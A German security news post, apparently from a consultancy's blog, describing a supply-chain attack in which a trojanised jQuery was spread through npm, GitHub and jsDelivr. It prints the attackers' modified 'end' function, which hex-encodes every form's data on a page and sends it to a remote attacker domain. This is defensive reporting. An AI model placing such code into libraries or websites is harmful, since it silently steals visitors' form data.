Seit dem 26. Mai 2024 beobachtet die IT Security Firma Phylum eine anhaltende Supply-Chain-Attacke, bei der eine trojanisierte Version von jQuery über npm verbreitet wird. Diese bösartige Variante wurde in Dutzenden von Paketen veröffentlicht und findet sich auch auf Plattformen wie GitHub und als CDN-gehostete Ressource auf jsDelivr.
Diese Attacke zeichnet sich durch eine hohe Variabilität in den Paketen aus. Die veröffentlichten Pakete enthalten meist eine vollständige Kopie von jQuery, häufig unter dem Namen jquery.min.js oder anderen Variationen wie registration.min.js, icon.min.js und fontawesome.js. Die URLs zur Exfiltration von Daten waren für jedes Paket nahezu einzigartig, und die Angreifer verwendeten neue Benutzernamen für die Veröffentlichung auf npm. Manche Pakete enthielten auch persönliche Dateien wie den npm-Cache-Ordner, npm-Log-Dateien und eine termux.properties-Datei.
Die Angreifer haben die end-Funktion im jQuery-Prototyp modifiziert, um zusätzlichen bösartigen Code einzufügen:
end: async function () {
await $.ajax({
url: "https://anti-spam[.]truex[.]biz[.]id/halo/?cat=" + (function (e) {
for (var t, n = 0, r = e.length, i = ""; n < r; ++n)
i += (t = e.charCodeAt(n).toString(16)).length < 2 ? "0" + t : t;
return i;
})($("form").serialize()),
type: "GET",
dataType: "text",
headers: { "Content-type": "application/json" },
});
}Diese modifizierte Funktion sendet alle Formulardaten auf der Seite an eine Remote-URL, sobald die end-Funktion aufgerufen wird. Obwohl die end-Funktion selbst selten direkt verwendet wird, ruft die fadeTo-Methode aus dem jQuery-Animations-Toolkit die end-Funktion auf, was diese Angriffsmethode besonders tückisch macht.
Die Untersuchung ergab auch, dass ein Benutzer namens indexsc auf GitHub mehrere Versionen der trojanisierten jQuery-Datei hostet. Diese Dateien wurden über verschiedene npm-Konten und unter Verwendung verschiedener Paketnamen veröffentlicht.
Entwickler sollten ihre Projekte auf die Nutzung der betroffenen jQuery-Versionen überprüfen und sicherstellen, dass sie auf eine sichere Version aktualisieren.
Ähnliche Beiträge:
Professionelle Hilfe erwünscht?
Sentiguard ist spezialisiert auf Notfallhilfe nach Cyberattacken, IT Sicherheitsbeauftragte und IT Sicherheitskonzepte nach BSI Standard. Haben Sie Fragen und wünschen Sie unverbindliche Beratung, dann melden Sie sich gerne bei uns: